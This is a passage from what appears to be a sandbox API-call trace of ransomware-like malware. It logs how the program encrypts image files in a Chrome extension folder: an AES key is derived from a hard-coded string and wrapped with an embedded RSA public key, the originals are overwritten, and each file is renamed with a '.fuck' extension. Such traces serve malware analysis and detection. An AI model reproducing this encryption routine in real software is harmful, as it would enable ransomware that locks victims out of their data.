pInfo=0x2e25c60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25c90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25c98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7c8c0) returned 1 [0258.788] CryptEncrypt (in: hKey=0x2e7c8c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0258.788] CryptEncrypt (in: hKey=0x2e7c8c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7b358*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e7b358*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0258.788] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e7b358*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e7b358*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.793] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0xa0, lpOverlapped=0x0) returned 1 [0258.794] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0xa0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0xb0) returned 1 [0258.794] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0xb0, lpOverlapped=0x0) returned 1 [0258.795] CloseHandle (hObject=0x5d60) returned 1 [0258.795] CloseHandle (hObject=0x5d50) returned 1 [0258.795] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), bFailIfExists=0) returned 1 [0258.799] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png", dwFileAttributes=0x0) returned 1 [0258.800] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.gsg")) returned 1 [0258.801] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.fuck")) returned 1 [0258.802] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0258.802] CryptDestroyKey (hKey=0x2e7c380) returned 1 [0258.802] CryptReleaseContext (hProv=0x2e7b028, dwFlags=0x0) returned 1 [0258.802] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.802] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0258.802] GetLastError () returned 0x0 [0258.802] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png")) returned 0x20 [0258.803] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png", dwFileAttributes=0x80) returned 1 [0258.803] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.804] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.804] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.gsg", dwFileAttributes=0x2) returned 1 [0258.805] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7b138) returned 1 [0258.806] CryptCreateHash (in: hProv=0x2e7b138, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0258.806] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.806] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.806] CryptDeriveKey (in: hProv=0x2e7b138, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7c200) returned 1 [0258.806] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.806] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0258.807] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e7bf90) returned 1 [0258.807] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7bf90, dwCertEncodingType=0x1, pInfo=0x2e266f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26720*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26728*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7c6c0) returned 1 [0258.807] CryptEncrypt (in: hKey=0x2e7c6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0258.807] CryptEncrypt (in: hKey=0x2e7c6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7ba40*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e7ba40*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0258.807] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e7ba40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e7ba40*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.808] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0xfc, lpOverlapped=0x0) returned 1 [0258.809] CryptEncrypt (in: hKey=0x2e7c200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0xfc, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x100) returned 1 [0258.809] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x100, lpOverlapped=0x0) returned 1 [0258.809] CloseHandle (hObject=0x5d50) returned 1 [0258.809] CloseHandle (hObject=0x5d60) returned 1 [0258.809] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), bFailIfExists=0) returned 1 [0258.812] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png", dwFileAttributes=0x0) returned 1 [0258.812] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.gsg")) returned 1 [0258.813] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.fuck")) returned 1 [0258.817] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0258.817] CryptDestroyKey (hKey=0x2e7c200) returned 1 [0258.817] CryptReleaseContext (hProv=0x2e7b138, dwFlags=0x0) returned 1 [0258.818] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.818] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0258.818] GetLastError () returned 0x0 [0258.818] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png")) returned 0x20 [0258.818] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png", dwFileAttributes=0x80) returned 1 [0258.818] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.819] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.819] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.gsg", dwFileAttributes=0x2) returned 1 [0258.820] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7b4f0) returned 1 [0258.821] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0258.822] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.822] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.822] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7c780) returned 1 [0258.822] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.822] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0258.822] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e7bd70) returned 1 [0258.822] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7bd70, dwCertEncodingType=0x1, pInfo=0x2e26550*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26580*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26588*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7c100) returned 1 [0258.822] CryptEncrypt (in: hKey=0x2e7c100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0258.822] CryptEncrypt (in: hKey=0x2e7c100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7b710*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e7b710*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0258.822] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e7b710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e7b710*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.823] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0xa0, lpOverlapped=0x0) returned 1 [0258.824] CryptEncrypt (in: hKey=0x2e7c780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0xa0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0xb0) returned 1 [0258.824] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0xb0, lpOverlapped=0x0) returned 1 [0258.824] CloseHandle (hObject=0x5d60) returned 1 [0258.825] CloseHandle (hObject=0x5d50) returned 1 [0258.825] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), bFailIfExists=0) returned 1 [0258.827] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png", dwFileAttributes=0x0) returned 1 [0258.828] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.gsg")) returned 1 [0258.829] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.fuck")) returned 1 [0258.829] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0258.829] CryptDestroyKey (hKey=0x2e7c780) returned 1 [0258.829] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0258.830] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.830] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0258.830] GetLastError () returned 0x0 [0258.830] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png")) returned 0x20 [0258.831] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png", dwFileAttributes=0x80) returned 1 [0258.831] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.832] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.832] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.gsg", dwFileAttributes=0x2) returned 1 [0258.833] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7b138) returned 1 [0258.835] CryptCreateHash (in: hProv=0x2e7b138, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0258.835] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.835] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.835] CryptDeriveKey (in: hProv=0x2e7b138, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7c700) returned 1 [0258.835] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, 